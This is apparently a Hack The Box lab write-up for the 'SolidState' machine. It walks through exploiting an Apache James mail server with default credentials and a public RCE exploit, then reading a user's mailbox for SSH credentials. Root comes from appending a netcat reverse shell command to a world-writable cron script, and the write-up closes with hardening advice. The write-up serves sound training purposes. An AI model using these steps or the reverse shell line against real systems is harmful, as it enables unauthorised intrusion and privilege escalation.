HTB: SolidState Writeup w/o Metasploit
Solidstate was another cool box to learn from. It introduced me to a new service and its vulnerabilities. Let’s get into how I popped it.
Recon
The first thing we did was run our nmap scans and quickly got a few ports back to work with.
Port 80 was an open port, so we opened up a web browser to check it out.
After going to http://10.10.10.51, we learn that there isn’t much for us to work with. It’s a Security consultant website and it looks like they’re offering security related services. We played around with the site, we checked out the links, and fuzzed the input fields, but there wasn’t anything useful at the moment.
Since there isn’t much to work with on port 80 as of now, let’s go back to our nmap results. FYI, we did run a gobuster scan and didn’t get much from that either. You can check it out in the video walkthrough.
Enumeration
Back to our nmap scan results. The version scan shows port 25, 110, and 119 open with a James service running on it. At the time, I didn’t know what this service was. From the nmap results I can guess it’s a mail service since it’s using default mail ports 25 (smtp) and 110 (pop3). At this moment, I took a break to learn more about James so I could have a better understanding of what we’re working with. Some simple Google Kung Fu gives us a remote code execution exploit.
This exploit uses default James credentials to login to the Remote Administration Tool and create a special user account. The account is “special” because it appears to be abusing some type of directory traversal vulnerability. Nonetheless, after the exploit creates the account, it drops a payload in its home directory. The payload gets executed when a user connects to the box (10.10.10.15), for example a user establishing a remote connection with ssh.
A few things to note before we run this exploit. One, the exploit is using default credentials to login to a Remote Administration Tool (RAT). In the comments, the author shows us the default port the exploit is using to connect to the RAT.
The exploit is connecting to the RAT via port 4555. We didn’t see this in our version scan. But it does come up in our full nmap scan.
So that means if we use the default credentials (root:root), which is what the exploit is using, we should successfully connect to the RAT via port 4555.
Exploitation
Before we try that, let’s start the exploit we got from exploit-db. Fortunately the exploit is written in python3, so we don’t need to make any adjustments for python2. If you run it without options, it shows us how to use it.
The exploit is pretty straightforward. We just need to submit the remote ip (10.10.10.51), our local ip (10.10.14.7), and our listener port (1234). Make sure you have the listener started.
We get a message stating we need somebody to log in to the box to execute our payload. Remember that’s how the exploit was scripted. It places a payload in a user’s directory and after someone logins it executes the payload. The “magic” behind this is “bash_completion.”
Remember, the script created a user name “../../../../../../../../etc/bash_completion.d.” When the user is created that “/etc/bash_completion.d” directory is also created. So anything we send via mail to that user gets stored in that bash_completion.d directory. Well if bash_completion is enabled, anything in that directory will execute when the user signs into the machine. Here’s a great writeup on the exploit.
So, we’ll either need to wait for someone to log in or log in as someone ourselves.
Let’s pivot to the Remote Administration Tool. Remember it was on port 4555 and using the root:root as the username and password. Let’s use netcat to connect it.
We’re connected to James Remote Administration Tool. Running the help command shows a list of commands.
After observing the commands, analyzing what we have access to, and assessing what we need to do (execute our payload with a login), we decide to change everyone’s password. Why?
Well, we need more information to complete our exploit and there may be useful information on these mail servers. And if we change the password, we won’t need to find the creds for these accounts. Ok, so let’s use a few of these commands we analyzed. Let list out the users with access to James. Just type “listusers”.
When I did this the first time, I changed everyone’s password. I logged into all of their accounts and found what we needed in Mindy’s mailbox. So, we’ll only focus on Mindy’s account here. Let’s change her password with the “setpassword” command.
Now that her password is changed let’s use telnet to login. FYI, when I first did this, I used netcat. Netcat didn’t work so I tried telnet and it worked out.
To connect just enter “telnet 10.10.10.51 110.” Then enter “USER mindy.” Then enter PASS “password123”. Now you should be connected. We did that in the screenshot above.
Now use the list command to list her mail. We see there are two messages here. We can use the “retr” command to retrieve the second email using “retr 2”.
Guess what!? The email shows Mindy’s ssh credentials. If we use that to log in as Mindy, the payload connects back to our listener.
Let’s ssh into mindy’s account with ssh mindy@10.10.10.51
In the screenshot above, the top pane we are running ssh to Mindy’s account. The bottom pane is our netcat listener getting a connection. You can see we ran “whoami” to show we’re under Mindy’s account. The top pane we used to run ssh is hung within a restricted shell. Notice that when you ssh to Mindy’s account, it puts you in a restricted bash shell. You can break out of this by logging in with “ssh mindy@10.10.10.51 -t bash.” I think you should be able to do the priv esc without the payload with that ssh access. I didn’t try it like that. I used the shell in the screenshot above to priv esc. Ok, let’s move forward with our current shell.
Privilege Escalation
Time to escalate privileges because Mindy doesn’t have root access. I transferred linenum to the target machine using a python web server. First, we start up the webserver using “python3 -m http.server 8000”.
Then we use wget to grab the file with “wget 10.10.14.12:8000/linenum.sh.”
Now the file is there we make it executable with “chmod +x linenum.sh.” And then run it with “./linenum.sh -t”. It returns a lot of information. Something interesting was the tmp.py file under the /opt/ directory. It has 777 (rwxrwxrwx) permissions set for owner, group, and all users. So, this means we can alter this file and there’s probably a cronjob running that executes it. FYI: There is a cronjob running as root that executes this file. We share that below after the priv esc.
Ok, let’s open up the tmp.py script and see what’s inside.
It’s a python script that’s removing all directories and files from the /tmp/ directory. Since we have write permissions, let’s write something that connects back to a listener. Initially, I tried uploading my own tmp.py file with my script in it, but the upload failed since the directory is owned by root. So instead, I appended a command to the tmp.py script.
We do this by entering the following: echo “os.system(‘nc -e /bin/bash 10.10.14.12 443’)” >> /opt/tmp.py. Make sure you have a listener started on the port you selected.
Afterwards, we’ll just have to wait a few minutes to catch a connection from that tmp.py script. It takes 3 minutes. There’s a cronjob running every 3 minutes. After logging in as root I checked the crontab and saw it set there, the screenshot is below. After 3 minutes we get a connection back with the root account.
Conclusion
Solidstate was another opportunity to gain more experience about a popular service and vulnerability. I personally learned a lot and had fun exploring everything we used to compromise this server. As a result, we have a few controls to suggest.
AAR
For starters we should change the credentials James is using. We used that to log in to the RAT and change Mindy’s password. If we didn’t have those default credentials, we wouldn’t have access to Mindy’s mailbox. Nonetheless, her credentials should be encrypted instead of in plaintext in her email. If it were encrypted, it would have made using it more difficult. Ultimately, changing credentials and upgrading to a more secure version of James would have prevented the initial exploit.
In addition, another good countermeasure would be to disable bash_completion. This would help to prevent malicious scripts from executing upon logins. This is something we leveraged to execute our payload for the initial shell access.
Furthermore, we’re recommending to harden the host by removing world writable permissions from the tmp.py file that root is executing every 3 minutes. Doing that will prevent the privilege escalation attack. Overall, this was an overly exciting box to work with. I hope you enjoyed this writeup as much as I did. Here is the video walkthrough. Thanks!
